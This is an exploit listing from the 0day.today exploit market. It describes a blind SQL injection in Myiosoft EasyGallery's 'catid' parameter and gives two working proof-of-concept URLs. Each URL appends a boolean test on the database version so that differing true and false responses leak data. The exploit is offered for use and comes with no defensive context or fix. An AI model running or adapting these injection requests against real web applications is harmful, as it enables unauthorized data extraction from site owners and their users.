[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Myiosoft EasyGallery (catid) Blind SQL Injection Vulnerability

Author
Hussin X
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10539
Category
web applications
Date add
31-12-2009
Platform
unsorted
==============================================================
Myiosoft EasyGallery (catid) Blind SQL Injection Vulnerability
==============================================================

___________________________________
 
 
script  : http://myiosoft.com/?1.105.0.0
 
Exploit :
_______
true & false
 
http://server/easygallery/index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=4  > false
 
http://server/easygallery/index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=5  > true



#  0day.today [2024-12-24]  #